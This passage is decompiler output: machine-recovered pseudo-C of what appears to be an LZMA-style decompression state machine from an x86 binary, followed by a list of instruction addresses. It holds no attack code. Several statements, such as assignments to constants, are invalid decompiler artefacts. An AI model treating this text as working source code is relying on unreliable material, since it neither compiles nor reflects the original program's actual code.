											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406695
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
